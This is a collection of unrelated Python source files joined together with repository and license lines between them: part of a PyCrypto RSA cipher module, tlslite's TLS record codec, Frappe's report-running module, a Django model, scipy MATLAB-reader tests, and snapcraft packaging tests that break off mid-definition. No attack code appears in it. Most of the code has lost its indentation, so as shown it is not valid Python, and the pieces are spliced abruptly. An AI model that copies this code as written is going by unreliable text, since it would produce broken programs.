The key to use to encrypt or decrypt the message. This is a `Crypto.PublicKey.RSA` object.
Decryption is only possible if *key* is a private RSA key.
"""
return PKCS115_Cipher(key)
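# A minimal end-to-end sketch, kept as a comment because it is not part of the
# original module (assumptions: 'pubkey.der' and 'privkey.der' exist and hold
# the matching halves of one RSA key pair; this simply mirrors the recipe given
# in the module docstring):
#
#   from Crypto.PublicKey import RSA
#   from Crypto.Hash import SHA
#   from Crypto import Random
#
#   message = 'To be encrypted'
#   cipher = new(RSA.importKey(open('pubkey.der').read()))
#   ct = cipher.encrypt(message + SHA.new(message).digest())
#
#   sentinel = Random.new().read(15 + SHA.digest_size)
#   plain = new(RSA.importKey(open('privkey.der').read())).decrypt(ct, sentinel)
#   # Verify the embedded digest; never compare the result against the sentinel.
#   ok = SHA.new(plain[:-SHA.digest_size]).digest() == plain[-SHA.digest_size:]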
|
gpl-3.0
|
kemalakyol48/python-for-android
|
python-build/python-libs/gdata/src/gdata/tlslite/utils/codec.py
|
361
|
2771
|
"""Classes for reading/writing binary data (such as TLS records)."""
from compat import *
class Writer:
def __init__(self, length=0):
#If length is zero, then this is just a "trial run" to determine length
self.index = 0
self.bytes = createByteArrayZeros(length)
def add(self, x, length):
if self.bytes:
newIndex = self.index+length-1
while newIndex >= self.index:
self.bytes[newIndex] = x & 0xFF
x >>= 8
newIndex -= 1
self.index += length
def addFixSeq(self, seq, length):
if self.bytes:
for e in seq:
self.add(e, length)
else:
self.index += len(seq)*length
def addVarSeq(self, seq, length, lengthLength):
if self.bytes:
self.add(len(seq)*length, lengthLength)
for e in seq:
self.add(e, length)
else:
self.index += lengthLength + (len(seq)*length)
class Parser:
def __init__(self, bytes):
self.bytes = bytes
self.index = 0
def get(self, length):
if self.index + length > len(self.bytes):
raise SyntaxError()
x = 0
for count in range(length):
x <<= 8
x |= self.bytes[self.index]
self.index += 1
return x
def getFixBytes(self, lengthBytes):
bytes = self.bytes[self.index : self.index+lengthBytes]
self.index += lengthBytes
return bytes
def getVarBytes(self, lengthLength):
lengthBytes = self.get(lengthLength)
return self.getFixBytes(lengthBytes)
def getFixList(self, length, lengthList):
l = [0] * lengthList
for x in range(lengthList):
l[x] = self.get(length)
return l
def getVarList(self, length, lengthLength):
lengthList = self.get(lengthLength)
if lengthList % length != 0:
raise SyntaxError()
lengthList = int(lengthList/length)
l = [0] * lengthList
for x in range(lengthList):
l[x] = self.get(length)
return l
def startLengthCheck(self, lengthLength):
self.lengthCheck = self.get(lengthLength)
self.indexCheck = self.index
def setLengthCheck(self, length):
self.lengthCheck = length
self.indexCheck = self.index
def stopLengthCheck(self):
if (self.index - self.indexCheck) != self.lengthCheck:
raise SyntaxError()
def atLengthCheck(self):
if (self.index - self.indexCheck) < self.lengthCheck:
return False
elif (self.index - self.indexCheck) == self.lengthCheck:
return True
else:
raise SyntaxError()
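# A minimal round-trip sketch (not part of the original module): the first
# Writer pass with length=0 only measures the encoding, the second pass with
# the measured length actually fills the byte array, and Parser reads it back.
if __name__ == '__main__':
    trial = Writer()
    trial.add(0x0301, 2)               # e.g. a two-byte TLS version field
    trial.addVarSeq([1, 2, 3], 1, 2)   # three one-byte items behind a two-byte length
    w = Writer(trial.index)
    w.add(0x0301, 2)
    w.addVarSeq([1, 2, 3], 1, 2)
    p = Parser(w.bytes)
    assert p.get(2) == 0x0301
    assert p.getVarList(1, 2) == [1, 2, 3]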
|
apache-2.0
|
gangadhar-kadam/helpdesk-frappe
|
frappe/desk/query_report.py
|
7
|
8955
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import os, json
from frappe import _
from frappe.modules import scrub, get_module_path
from frappe.utils import flt, cint, get_html_format
from frappe.translate import send_translations
import frappe.desk.reportview
from frappe.permissions import get_role_permissions
def get_report_doc(report_name):
doc = frappe.get_doc("Report", report_name)
if not doc.has_permission("read"):
frappe.throw(_("You don't have access to Report: {0}").format(report_name), frappe.PermissionError)
if not frappe.has_permission(doc.ref_doctype, "report"):
frappe.throw(_("You don't have permission to get a report on: {0}").format(doc.ref_doctype),
frappe.PermissionError)
if doc.disabled:
frappe.throw(_("Report {0} is disabled").format(report_name))
return doc
@frappe.whitelist()
def get_script(report_name):
report = get_report_doc(report_name)
module = report.module or frappe.db.get_value("DocType", report.ref_doctype, "module")
module_path = get_module_path(module)
report_folder = os.path.join(module_path, "report", scrub(report.name))
script_path = os.path.join(report_folder, scrub(report.name) + ".js")
print_path = os.path.join(report_folder, scrub(report.name) + ".html")
script = None
if os.path.exists(script_path):
with open(script_path, "r") as f:
script = f.read()
html_format = get_html_format(print_path)
if not script and report.javascript:
script = report.javascript
if not script:
script = "frappe.query_reports['%s']={}" % report_name
# load translations
if frappe.lang != "en":
send_translations(frappe.get_lang_dict("report", report_name))
return {
"script": script,
"html_format": html_format
}
@frappe.whitelist()
def run(report_name, filters=()):
report = get_report_doc(report_name)
if filters and isinstance(filters, basestring):
filters = json.loads(filters)
if not frappe.has_permission(report.ref_doctype, "report"):
frappe.msgprint(_("Must have report permission to access this report."),
raise_exception=True)
columns, result = [], []
if report.report_type=="Query Report":
if not report.query:
frappe.msgprint(_("Must specify a Query to run"), raise_exception=True)
if not report.query.lower().startswith("select"):
frappe.msgprint(_("Query must be a SELECT"), raise_exception=True)
result = [list(t) for t in frappe.db.sql(report.query, filters)]
columns = [c[0] for c in frappe.db.get_description()]
else:
module = report.module or frappe.db.get_value("DocType", report.ref_doctype, "module")
if report.is_standard=="Yes":
method_name = get_report_module_dotted_path(module, report.name) + ".execute"
columns, result = frappe.get_attr(method_name)(frappe._dict(filters))
if report.apply_user_permissions and result:
result = get_filtered_data(report.ref_doctype, columns, result)
if cint(report.add_total_row) and result:
result = add_total_row(result, columns)
return {
"result": result,
"columns": columns
}
def get_report_module_dotted_path(module, report_name):
return frappe.local.module_app[scrub(module)] + "." + scrub(module) \
+ ".report." + scrub(report_name) + "." + scrub(report_name)
def add_total_row(result, columns):
total_row = [""]*len(columns)
has_percent = []
for row in result:
for i, col in enumerate(columns):
fieldtype = None
if isinstance(col, basestring):
col = col.split(":")
if len(col) > 1:
fieldtype = col[1]
else:
fieldtype = col.get("fieldtype")
if fieldtype in ["Currency", "Int", "Float", "Percent"] and flt(row[i]):
total_row[i] = flt(total_row[i]) + flt(row[i])
if fieldtype == "Percent" and i not in has_percent:
has_percent.append(i)
for i in has_percent:
total_row[i] = total_row[i] / len(result)
first_col_fieldtype = None
if isinstance(columns[0], basestring):
first_col = columns[0].split(":")
if len(first_col) > 1:
first_col_fieldtype = first_col[1].split("/")[0]
else:
first_col_fieldtype = columns[0].get("fieldtype")
if first_col_fieldtype not in ["Currency", "Int", "Float", "Percent"]:
if first_col_fieldtype == "Link":
total_row[0] = "'" + _("Total") + "'"
else:
total_row[0] = _("Total")
result.append(total_row)
return result
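# Worked example for add_total_row (hypothetical report data): with columns
# ["Item:Link/Item", "Qty:Int", "Margin:Percent"] and rows
# [["a", 2, 50], ["b", 4, 70]], the appended row is ["'Total'", 6.0, 60.0] --
# Int/Float/Currency columns are summed, Percent columns are averaged over the
# number of rows, and a Link first column gets the quoted 'Total' label.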
def get_filtered_data(ref_doctype, columns, data):
result = []
linked_doctypes = get_linked_doctypes(columns, data)
match_filters_per_doctype = get_user_match_filters(linked_doctypes, ref_doctype)
shared = frappe.share.get_shared(ref_doctype)
columns_dict = get_columns_dict(columns)
role_permissions = get_role_permissions(frappe.get_meta(ref_doctype))
if_owner = role_permissions.get("if_owner", {}).get("report")
if match_filters_per_doctype:
for row in data:
# Why linked_doctypes.get(ref_doctype)? because if column is empty, linked_doctypes[ref_doctype] is removed
if linked_doctypes.get(ref_doctype) and shared and row[linked_doctypes[ref_doctype]] in shared:
result.append(row)
elif has_match(row, linked_doctypes, match_filters_per_doctype, ref_doctype, if_owner, columns_dict):
result.append(row)
else:
result = list(data)
return result
def has_match(row, linked_doctypes, doctype_match_filters, ref_doctype, if_owner, columns_dict):
"""Returns True if after evaluating permissions for each linked doctype
- There is an owner match for the ref_doctype
- `and` There is a user permission match for all linked doctypes
Returns True if the row is empty
Note:
	Each doctype could have multiple conflicting user permission doctypes.
	Hence, if any one of those permission sets allows a match, the doctype is treated as matched.
	This behavior is equivalent to trickling the user permissions of linked doctypes down to the ref doctype.
"""
resultant_match = True
if not row:
# allow empty rows :)
return resultant_match
for doctype, filter_list in doctype_match_filters.items():
matched_for_doctype = False
if doctype==ref_doctype and if_owner:
idx = linked_doctypes.get("User")
if (idx is not None
and row[idx]==frappe.session.user
and columns_dict[idx]==columns_dict.get("owner")):
# owner match is true
matched_for_doctype = True
if not matched_for_doctype:
for match_filters in filter_list:
match = True
for dt, idx in linked_doctypes.items():
# case handled above
if dt=="User" and columns_dict[idx]==columns_dict.get("owner"):
continue
if dt in match_filters and row[idx] not in match_filters[dt]:
match = False
break
# each doctype could have multiple conflicting user permission doctypes, hence using OR
# so that even if one of the sets allows a match, it is true
matched_for_doctype = matched_for_doctype or match
if matched_for_doctype:
break
# each doctype's user permissions should match the row! hence using AND
resultant_match = resultant_match and matched_for_doctype
if not resultant_match:
break
return resultant_match
def get_linked_doctypes(columns, data):
linked_doctypes = {}
columns_dict = get_columns_dict(columns)
for idx, col in enumerate(columns):
df = columns_dict[idx]
if df.get("fieldtype")=="Link":
if isinstance(col, basestring):
linked_doctypes[df["options"]] = idx
else:
# dict
linked_doctypes[df["options"]] = df["fieldname"]
# remove doctype if column is empty
columns_with_value = []
for row in data:
if row:
if len(row) != len(columns_with_value):
if isinstance(row, (list, tuple)):
row = enumerate(row)
elif isinstance(row, dict):
row = row.items()
for col, val in row:
if val and col not in columns_with_value:
columns_with_value.append(col)
for doctype, key in linked_doctypes.items():
if key not in columns_with_value:
del linked_doctypes[doctype]
return linked_doctypes
def get_columns_dict(columns):
"""Returns a dict with column docfield values as dict
The keys for the dict are both idx and fieldname,
so either index or fieldname can be used to search for a column's docfield properties
"""
columns_dict = {}
for idx, col in enumerate(columns):
col_dict = {}
# string
if isinstance(col, basestring):
col = col.split(":")
if len(col) > 1:
if "/" in col[1]:
col_dict["fieldtype"], col_dict["options"] = col[1].split("/")
else:
col_dict["fieldtype"] = col[1]
col_dict["fieldname"] = frappe.scrub(col[0])
# dict
else:
col_dict.update(col)
if "fieldname" not in col_dict:
col_dict["fieldname"] = frappe.scrub(col_dict["label"])
columns_dict[idx] = col_dict
columns_dict[col_dict["fieldname"]] = col_dict
return columns_dict
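# Example of the two column formats handled above (hypothetical columns, shown
# only for illustration): "Customer:Link/Customer:120" yields, under both key 0
# and key "customer", {"fieldname": "customer", "fieldtype": "Link",
# "options": "Customer"}; the dict form {"label": "Amount", "fieldtype":
# "Currency"} gets its missing fieldname scrubbed from the label ("amount").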
def get_user_match_filters(doctypes, ref_doctype):
match_filters = {}
for dt in doctypes:
filter_list = frappe.desk.reportview.build_match_conditions(dt, False)
if filter_list:
match_filters[dt] = filter_list
return match_filters
|
mit
|
mainecivichackday/wheresyourtrash
|
wheresyourtrash/apps/email2sms/models.py
|
2
|
1080
|
from django.core.urlresolvers import reverse
from django.db.models import *
from django_extensions.db.fields import AutoSlugField
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import models as auth_models
from django.db import models as models
from django_extensions.db import fields as extension_fields
class Provider(models.Model):
# Fields
name = models.CharField(max_length=255)
slug = extension_fields.AutoSlugField(populate_from='name', blank=True)
created = models.DateTimeField(auto_now_add=True, editable=False)
last_updated = models.DateTimeField(auto_now=True, editable=False)
email_root = models.CharField(max_length=50)
class Meta:
ordering = ('-created',)
def __str__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse('email2sms_provider_detail', args=(self.slug,))
def get_update_url(self):
return reverse('email2sms_provider_update', args=(self.slug,))
|
bsd-3-clause
|
drpeteb/scipy
|
scipy/io/matlab/tests/test_mio5_utils.py
|
106
|
5604
|
""" Testing mio5_utils Cython module
"""
from __future__ import division, print_function, absolute_import
import sys
from io import BytesIO
cStringIO = BytesIO
import numpy as np
from nose.tools import (assert_true, assert_equal, assert_raises)
from numpy.testing import (assert_array_equal, run_module_suite)
from scipy._lib.six import u
import scipy.io.matlab.byteordercodes as boc
import scipy.io.matlab.streams as streams
import scipy.io.matlab.mio5_params as mio5p
import scipy.io.matlab.mio5_utils as m5u
def test_byteswap():
for val in (
1,
0x100,
0x10000):
a = np.array(val, dtype=np.uint32)
b = a.byteswap()
c = m5u.byteswap_u4(a)
assert_equal(b.item(), c)
d = m5u.byteswap_u4(c)
assert_equal(a.item(), d)
def _make_tag(base_dt, val, mdtype, sde=False):
''' Makes a simple matlab tag, full or sde '''
base_dt = np.dtype(base_dt)
bo = boc.to_numpy_code(base_dt.byteorder)
byte_count = base_dt.itemsize
if not sde:
udt = bo + 'u4'
padding = 8 - (byte_count % 8)
all_dt = [('mdtype', udt),
('byte_count', udt),
('val', base_dt)]
if padding:
all_dt.append(('padding', 'u1', padding))
else: # is sde
udt = bo + 'u2'
padding = 4-byte_count
if bo == '<': # little endian
all_dt = [('mdtype', udt),
('byte_count', udt),
('val', base_dt)]
else: # big endian
all_dt = [('byte_count', udt),
('mdtype', udt),
('val', base_dt)]
if padding:
all_dt.append(('padding', 'u1', padding))
tag = np.zeros((1,), dtype=all_dt)
tag['mdtype'] = mdtype
tag['byte_count'] = byte_count
tag['val'] = val
return tag
def _write_stream(stream, *strings):
stream.truncate(0)
stream.seek(0)
for s in strings:
stream.write(s)
stream.seek(0)
def _make_readerlike(stream, byte_order=boc.native_code):
class R(object):
pass
r = R()
r.mat_stream = stream
r.byte_order = byte_order
r.struct_as_record = True
r.uint16_codec = sys.getdefaultencoding()
r.chars_as_strings = False
r.mat_dtype = False
r.squeeze_me = False
return r
def test_read_tag():
# mainly to test errors
# make reader-like thing
str_io = BytesIO()
r = _make_readerlike(str_io)
c_reader = m5u.VarReader5(r)
# This works for StringIO but _not_ cStringIO
assert_raises(IOError, c_reader.read_tag)
# bad SDE
tag = _make_tag('i4', 1, mio5p.miINT32, sde=True)
tag['byte_count'] = 5
_write_stream(str_io, tag.tostring())
assert_raises(ValueError, c_reader.read_tag)
def test_read_stream():
tag = _make_tag('i4', 1, mio5p.miINT32, sde=True)
tag_str = tag.tostring()
str_io = cStringIO(tag_str)
st = streams.make_stream(str_io)
s = streams._read_into(st, tag.itemsize)
assert_equal(s, tag.tostring())
def test_read_numeric():
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io)
# check simplest of tags
for base_dt, val, mdtype in (('u2', 30, mio5p.miUINT16),
('i4', 1, mio5p.miINT32),
('i2', -1, mio5p.miINT16)):
for byte_code in ('<', '>'):
r.byte_order = byte_code
c_reader = m5u.VarReader5(r)
assert_equal(c_reader.little_endian, byte_code == '<')
assert_equal(c_reader.is_swapped, byte_code != boc.native_code)
for sde_f in (False, True):
dt = np.dtype(base_dt).newbyteorder(byte_code)
a = _make_tag(dt, val, mdtype, sde_f)
a_str = a.tostring()
_write_stream(str_io, a_str)
el = c_reader.read_numeric()
assert_equal(el, val)
# two sequential reads
_write_stream(str_io, a_str, a_str)
el = c_reader.read_numeric()
assert_equal(el, val)
el = c_reader.read_numeric()
assert_equal(el, val)
def test_read_numeric_writeable():
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io, '<')
c_reader = m5u.VarReader5(r)
dt = np.dtype('<u2')
a = _make_tag(dt, 30, mio5p.miUINT16, 0)
a_str = a.tostring()
_write_stream(str_io, a_str)
el = c_reader.read_numeric()
assert_true(el.flags.writeable)
def test_zero_byte_string():
# Tests hack to allow chars of non-zero length, but 0 bytes
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io, boc.native_code)
c_reader = m5u.VarReader5(r)
tag_dt = np.dtype([('mdtype', 'u4'), ('byte_count', 'u4')])
tag = np.zeros((1,), dtype=tag_dt)
tag['mdtype'] = mio5p.miINT8
tag['byte_count'] = 1
hdr = m5u.VarHeader5()
# Try when string is 1 length
hdr.set_dims([1,])
_write_stream(str_io, tag.tostring() + b' ')
str_io.seek(0)
val = c_reader.read_char(hdr)
assert_equal(val, u(' '))
# Now when string has 0 bytes 1 length
tag['byte_count'] = 0
_write_stream(str_io, tag.tostring())
str_io.seek(0)
val = c_reader.read_char(hdr)
assert_equal(val, u(' '))
# Now when string has 0 bytes 4 length
str_io.seek(0)
hdr.set_dims([4,])
val = c_reader.read_char(hdr)
assert_array_equal(val, [u(' ')] * 4)
if __name__ == "__main__":
run_module_suite()
|
bsd-3-clause
|
elopio/snapcraft
|
tests/unit/test_meta.py
|
1
|
39249
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import configparser
import logging
import os
from unittest.mock import patch
import fixtures
import testscenarios
import testtools
import yaml
from testtools.matchers import (
Contains,
Equals,
FileContains,
FileExists,
HasLength,
Not
)
from snapcraft.internal.meta import (
_errors as meta_errors,
_snap_packaging
)
from snapcraft import ProjectOptions, extractors
from snapcraft.internal import common
from snapcraft.internal import errors
from snapcraft.internal import project_loader
from tests import unit, fixture_setup
class CreateBaseTestCase(unit.TestCase):
def setUp(self):
super().setUp()
self.config_data = {
'architectures': ['amd64'],
'name': 'my-package',
'version': '1.0',
'description': 'my description',
'summary': 'my summary',
'confinement': 'devmode',
'environment': {
'GLOBAL': 'y',
},
'parts': {
'test-part': {
'plugin': 'nil',
}
}
}
patcher = patch(
'snapcraft.internal.project_loader.get_snapcraft_yaml')
self.mock_get_yaml = patcher.start()
self.mock_get_yaml.return_value = os.path.join(
'snap', 'snapcraft.yaml')
self.addCleanup(patcher.stop)
# Ensure the ensure snapcraft.yaml method has something to copy.
_create_file(os.path.join('snap', 'snapcraft.yaml'))
self.meta_dir = os.path.join(self.prime_dir, 'meta')
self.hooks_dir = os.path.join(self.meta_dir, 'hooks')
self.snap_yaml = os.path.join(self.meta_dir, 'snap.yaml')
self.project_options = ProjectOptions()
def generate_meta_yaml(self, *, build=False):
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
self.config = project_loader.load_config()
if build:
for part in self.config.parts.all_parts:
part.pull()
part.build()
_snap_packaging.create_snap_packaging(
self.config.data, self.config.parts, self.project_options, 'dummy')
self.assertTrue(
os.path.exists(self.snap_yaml), 'snap.yaml was not created')
with open(self.snap_yaml) as f:
return yaml.load(f)
class CreateTestCase(CreateBaseTestCase):
def test_create_meta(self):
y = self.generate_meta_yaml()
expected = {'architectures': ['amd64'],
'confinement': 'devmode',
'grade': 'stable',
'description': 'my description',
'environment': {'GLOBAL': 'y'},
'summary': 'my summary',
'name': 'my-package',
'version': '1.0'}
self.assertThat(y, Equals(expected))
def test_create_meta_with_epoch(self):
self.config_data['epoch'] = '1*'
y = self.generate_meta_yaml()
self.assertTrue(
'epoch' in y,
'Expected "epoch" property to be copied into snap.yaml')
self.assertThat(y['epoch'], Equals('1*'))
def test_create_meta_with_assumes(self):
self.config_data['assumes'] = ['feature1', 'feature2']
y = self.generate_meta_yaml()
self.assertTrue(
'assumes' in y,
'Expected "assumes" property to be copied into snap.yaml')
self.assertThat(y['assumes'], Equals(['feature1', 'feature2']))
def test_create_gadget_meta_with_gadget_yaml(self):
gadget_yaml = 'stub entry: stub value'
_create_file('gadget.yaml', content=gadget_yaml)
self.config_data['type'] = 'gadget'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
expected_gadget = os.path.join(self.meta_dir, 'gadget.yaml')
self.assertTrue(os.path.exists(expected_gadget))
self.assertThat(expected_gadget, FileContains(gadget_yaml))
def test_create_gadget_meta_with_missing_gadget_yaml_raises_error(self):
self.config_data['type'] = 'gadget'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
self.assertRaises(
errors.MissingGadgetError,
_snap_packaging.create_snap_packaging,
self.config_data,
config.parts,
self.project_options,
'dummy'
)
def test_create_meta_with_declared_icon(self):
_create_file(os.path.join(os.curdir, 'my-icon.png'))
self.config_data['icon'] = 'my-icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_with_dots(self):
_create_file('com.my.icon.png')
self.config_data['icon'] = 'com.my.icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_in_parent_dir(self):
_create_file('my-icon.png')
builddir = os.path.join(os.curdir, 'subdir')
os.mkdir(builddir)
os.chdir(builddir)
self.config_data['icon'] = '../my-icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_and_setup(self):
fake_logger = fixtures.FakeLogger(level=logging.INFO)
self.useFixture(fake_logger)
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
setup_icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'),
content=setup_icon_content)
declared_icon_content = 'declared icon'
_create_file('my-icon.png',
content=declared_icon_content)
self.config_data['icon'] = 'my-icon.png'
y = self.generate_meta_yaml()
expected_icon = os.path.join(self.meta_dir, 'gui', 'icon.png')
self.assertTrue(os.path.exists(expected_icon),
'icon.png was not setup correctly')
self.assertThat(expected_icon, FileContains(declared_icon_content))
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
# Check for the correct deprecation message.
self.assertIn(
"Assets in 'setup/gui' should now be placed in 'snap/gui'.",
fake_logger.output)
self.assertIn(
"See http://snapcraft.io/docs/deprecation-notices/dn3",
fake_logger.output)
def test_create_meta_with_declared_icon_and_setup_ran_twice_ok(self):
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'), content=icon_content)
_create_file('my-icon.png')
self.config_data['icon'] = 'my-icon.png'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
# Running again should be good
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
def test_create_meta_with_icon_in_setup(self):
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'), content=icon_content)
y = self.generate_meta_yaml()
expected_icon = os.path.join(self.meta_dir, 'gui', 'icon.png')
self.assertThat(expected_icon, FileContains(icon_content))
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_sockets(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
sockets = {
'sock1': {
'listen-stream': 8080,
},
'sock2': {
'listen-stream': '$SNAP_COMMON/sock2',
'socket-mode': 0o640}}
self.config_data['apps'] = {
'app': {'command': 'app.sh',
'sockets': sockets}}
y = self.generate_meta_yaml()
self.assertThat(y['apps']['app']['sockets'], Equals(sockets))
def test_version_script(self):
self.config_data['version-script'] = 'echo 10.1-devel'
y = self.generate_meta_yaml()
self.assertThat(y['version'], Equals('10.1-devel'))
def test_version_script_exits_bad(self):
self.config_data['version-script'] = 'exit 1'
with testtools.ExpectedException(meta_errors.CommandError):
self.generate_meta_yaml()
def test_version_script_with_no_output(self):
self.config_data['version-script'] = 'echo'
with testtools.ExpectedException(meta_errors.CommandError):
self.generate_meta_yaml()
def test_create_meta_with_app(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
self.config_data['apps'] = {
'app1': {'command': 'app.sh'},
'app2': {'command': 'app.sh', 'plugs': ['network']},
'app3': {'command': 'app.sh', 'plugs': ['network-server']},
'app4': {'command': 'app.sh', 'plugs': ['network-server'],
'environment': {'XDG_SOMETHING': '$SNAP_USER_DATA',
'LANG': 'C'}},
'app5': {'command': 'app.sh', 'common-id': 'test-common-id'}
}
self.config_data['plugs'] = {
'network-server': {'interface': 'network-bind'}}
y = self.generate_meta_yaml()
for app in ['app1', 'app2', 'app3']:
app_wrapper_path = os.path.join(
self.prime_dir, 'command-{}.wrapper'.format(app))
self.assertTrue(
os.path.exists(app_wrapper_path),
'the wrapper for {!r} was not setup correctly'.format(app))
expected = {
'architectures': ['amd64'],
'apps': {
'app1': {
'command': 'command-app1.wrapper',
},
'app2': {
'command': 'command-app2.wrapper',
'plugs': ['network'],
},
'app3': {
'command': 'command-app3.wrapper',
'plugs': ['network-server'],
},
'app4': {
'command': 'command-app4.wrapper',
'plugs': ['network-server'],
'environment': {
'XDG_SOMETHING': '$SNAP_USER_DATA',
'LANG': 'C'}
},
'app5': {
'command': 'command-app5.wrapper',
'common-id': 'test-common-id'
}
},
'description': 'my description',
'summary': 'my summary',
'name': 'my-package',
'version': '1.0',
'confinement': 'devmode',
'grade': 'stable',
'environment': {'GLOBAL': 'y'},
'plugs': {
'network-server': {
'interface': 'network-bind',
}
}
}
self.assertThat(y, Equals(expected))
def test_create_meta_with_app_desktop_key(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
_create_file(os.path.join(self.prime_dir, 'app1.desktop'),
content='[Desktop Entry]\nExec=app1.exe\nIcon=app1.png')
icon_dir = os.path.join(self.prime_dir, 'usr', 'share')
os.makedirs(icon_dir)
_create_file(os.path.join(icon_dir, 'app2.png'))
_create_file(os.path.join(self.prime_dir, 'app2.desktop'),
content='[Desktop Entry]\nExec=app2.exe\nIcon=/usr/share/'
'app2.png')
_create_file(os.path.join(self.prime_dir, 'app3.desktop'),
content='[Desktop Entry]\nExec=app3.exe\nIcon=app3.png')
self.config_data['apps'] = {
'app1': {'command': 'app.sh', 'desktop': 'app1.desktop'},
'app2': {'command': 'app.sh', 'desktop': 'app2.desktop'},
'my-package': {'command': 'app.sh', 'desktop': 'app3.desktop'}
}
self.generate_meta_yaml()
desktop_file = os.path.join(self.meta_dir, 'gui', 'app1.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(
contents[section].get('Exec'), Equals('my-package.app1 %U'))
self.assertThat(contents[section].get('Icon'), Equals('app1.png'))
desktop_file = os.path.join(self.meta_dir, 'gui', 'app2.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(
contents[section].get('Exec'), Equals('my-package.app2 %U'))
self.assertThat(contents[section].get('Icon'),
Equals('${SNAP}/usr/share/app2.png'))
desktop_file = os.path.join(self.meta_dir, 'gui', 'my-package.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(contents[section].get('Exec'), Equals('my-package %U'))
snap_yaml = os.path.join('prime', 'meta', 'snap.yaml')
self.assertThat(snap_yaml, Not(FileContains('desktop: app1.desktop')))
self.assertThat(snap_yaml, Not(FileContains('desktop: app2.desktop')))
self.assertThat(snap_yaml, Not(FileContains('desktop: app3.desktop')))
self.assertThat(snap_yaml,
Not(FileContains('desktop: my-package.desktop')))
def test_create_meta_with_hook(self):
hooksdir = os.path.join(self.snap_dir, 'hooks')
os.makedirs(hooksdir)
_create_file(os.path.join(hooksdir, 'foo'), executable=True)
_create_file(os.path.join(hooksdir, 'bar'), executable=True)
self.config_data['hooks'] = {
'foo': {'plugs': ['plug']},
'bar': {}
}
y = self.generate_meta_yaml()
self.assertThat(
y, Contains('hooks'), "Expected generated YAML to contain 'hooks'")
for hook in ('foo', 'bar'):
generated_hook_path = os.path.join(
self.prime_dir, 'meta', 'hooks', hook)
self.assertThat(
generated_hook_path, FileExists(),
'The {!r} hook was not setup correctly'.format(hook))
self.assertThat(
y['hooks'], Contains(hook),
'Expected generated hooks to contain {!r}'.format(hook))
self.assertThat(
y['hooks']['foo'], Contains('plugs'),
"Expected generated 'foo' hook to contain 'plugs'")
self.assertThat(y['hooks']['foo']['plugs'], HasLength(1))
self.assertThat(y['hooks']['foo']['plugs'][0], Equals('plug'))
self.assertThat(
y['hooks']['bar'], Not(Contains('plugs')),
"Expected generated 'bar' hook to not contain 'plugs'")
class CreateMetadataFromSourceBaseTestCase(CreateBaseTestCase):
def setUp(self):
super().setUp()
self.config_data = {
'name': 'test-name',
'version': 'test-version',
'summary': 'test-summary',
'description': 'test-description',
'adopt-info': 'test-part',
'parts': {
'test-part': {
'plugin': 'nil',
'parse-info': ['test-metadata-file']
}
},
'apps': {
'test-app': {
